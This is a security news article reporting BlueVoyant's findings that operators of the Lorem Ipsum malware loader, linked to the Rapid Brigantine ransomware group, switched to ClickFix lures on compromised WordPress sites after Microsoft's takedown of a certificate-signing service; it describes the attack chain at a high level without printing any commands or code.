Microsoft’s disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures.

Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model.

Making a Quick Pivot to ClickFix

“The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely,” BlueVoyant said in its report on Tuesday. 

Related:The Beginning of the End of Social Engineering

Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. “The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites,” the company noted.

BlueVoyant had initially assessed Lorem Ipsum, to be a rapidly maturing malware campaign likely operated by a sophisticated, mid-tier initial access broker that launched in February 2026. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant.

The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems. 

BlueVoyant’s analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant.

Related:Chinese, N. Korean Threat Groups Build on Asia-Pacific Success

ClickFix Lures on WordPress Sites

For the new ClickFix delivery model, Lorem Ipsum’s operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services and construction technology. An injected iframe on the website displays a fake browser update notification about the user’s browser being out of date.

In a manner similar to other ClickFix scams, the pop-op instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been successfully updated. 

A Troubling Connection to Ransomware Actors

BlueVoyant’s view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims. According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described SEO poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates; and a DFIR report where a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine.

Related:Silent Ransom Group Hits US Law Firms in Escalating Extortion Attacks

The Lorem Ipsum campaign is the latest example of the resilience modern threat actors have built up against attempts to disrupt their operations. Rather than allowing Microsoft’s takedown of the Fox Tempest signing service to disrupt their operations, Lorem Ipsum actors pivoted to a new delivery model that has actually heightened their threat profile.

For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BueVoyant noted. 

“Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators’ demonstrated capacity for rapid pivot in response to disruption,” the security vendor said. “The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine’s multiple delivery pipelines,” rather than individual delivery mechanisms or malware variants.





Source link

#

Comments are closed